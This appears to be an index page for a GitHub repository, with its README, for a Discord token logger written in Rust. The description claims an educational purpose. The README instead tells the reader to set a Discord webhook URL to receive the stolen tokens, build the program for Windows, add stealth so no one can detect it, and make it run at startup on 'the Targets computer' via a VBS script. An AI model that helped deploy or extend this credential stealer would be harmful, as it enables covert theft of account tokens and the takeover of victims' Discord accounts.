Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/masterofbrokenlogic/discordtokenlogger
This project is a Discord token logger written in Rust, designed for educational purposes to demonstrate how Discord tokens can be captured and managed securely. It aims to educate users about potential security vulnerabilities and how to protect against them.
https://github.com/masterofbrokenlogic/discordtokenlogger
discord logger rust token token-logger
Last synced: 9 days ago
JSON representation
This project is a Discord token logger written in Rust, designed for educational purposes to demonstrate how Discord tokens can be captured and managed securely. It aims to educate users about potential security vulnerabilities and how to protect against them.
- Host: GitHub
- URL: https://github.com/masterofbrokenlogic/discordtokenlogger
- Owner: MasterOfBrokenLogic
- License: mit
- Created: 2024-07-14T09:36:01.000Z (6 months ago)
- Default Branch: main
- Last Pushed: 2024-07-28T18:45:31.000Z (5 months ago)
- Last Synced: 2024-11-06T10:35:49.619Z (about 2 months ago)
- Topics: discord, logger, rust, token, token-logger
- Language: Rust
- Homepage:
- Size: 28.3 KB
- Stars: 1
- Watchers: 1
- Forks: 1
- Open Issues: 2
-
Metadata Files:
- Readme: README.md
- Contributing: CONTRIBUTING.md
- License: LICENSE
Awesome Lists containing this project
README
# Discord Token Logger
![Rust](https://img.shields.io/badge/Rust-1.54.0-orange?style=for-the-badge)
![Build](https://img.shields.io/badge/Build-Passing-brightgreen?style=for-the-badge)
![Platform](https://img.shields.io/badge/Platform-Windows-blue?style=for-the-badge)A Discord Token Logger Written in Rust.
### Configuration
On line 11 in [main.rs](https://github.com/MasterOfBrokenLogic/DiscordTokenLogger/blob/main/src/main.rs) , replace the variable with your webhook URL from Discord.
If you're unsure about what a Webhook URL is or how to obtain one, feel free to reach out to me on WhatsApp for assistance. I'm here to help, my friend!```rust
let url = "Discord Webhook URL";
```To build this project just run:
```shell
$ cargo build --target x86_64-pc-windows-gnu
```This is just a simple Token Logger, you can add more features for the stealth of the program, so no one can detect this. Create a vbs program in the Targets computer to run this project in the startup, If you need the vbs code to make this program to run in the startup, message me.
I hate strings :3